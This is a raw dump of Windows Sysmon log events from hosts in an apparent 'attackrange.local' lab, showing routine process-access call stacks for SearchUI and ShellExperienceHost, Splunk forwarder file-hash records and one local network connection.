10341000x80000000000000001049722Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049721Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049720Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049719Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049718Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049717Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049716Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049715Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049714Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049713Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049712Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-32D3-60E8-770B-00000000CF01}63564228C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049711Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-32D3-60E8-770B-00000000CF01}63564228C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049710Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.015{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8139130B4D0BDE21A1E25371E551E2A9,SHA256=20D27CF9F38330E2C01C0AB4B9B5BFD041C44015800F38E93F411F57F1A920DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808022Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:45.722{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B88F5AD1746AC15E2EEDDD47EF536D02,SHA256=546B488981FBC3416C8311326715BD4E153FDC67721F0AB5F68C38589611E47C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049747Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:37.684{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51062-false10.0.1.12-8000- 23542300x80000000000000001049746Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:45.025{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A9FC2BB732473568B2571E53DFC599E,SHA256=A6BC9560BAE330D5BB4D59D74DA10C10FC520BFD65267D1F368548E29F5E7C93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808023Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:46.753{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19B729851ED82331246043E93886C153,SHA256=175CE7FED2459F8E91BD90A8406C41B0FDC9C44DF3AB81D12C5E1ED8C134185E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049748Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:46.174{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91AAD4AD3BA80168D6E98CF916C85C49,SHA256=CD6E129B91487215FD81516EF4F2FA7A85F5DED498487E78266B602597E5560A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808024Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:47.769{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41182F116D4CFF077D48AF96B58546A9,SHA256=1355EADF0727E30A277AD68E0C7A60167029712DDF5B221B9AE89A46AB39698B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049749Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:47.205{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5321F095F760B4E2CCB0A2AC42D30A99,SHA256=8D4265B7B47314418AA41F5EAA7A81722579AAFB14E1F14AECBF74C087B6C40C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808025Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:48.785{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B0D16FE3839819054F1859D76ABA08B,SHA256=501899FDAECED36C49CD10235E96DA893AF2F0DD13D1094D65C272B202860871,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049758Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:48.874{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049757Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:48.874{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049756Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:48.858{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049755Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:48.858{466BC892-32D3-60E8-770B-00000000CF01}635610232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049754Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 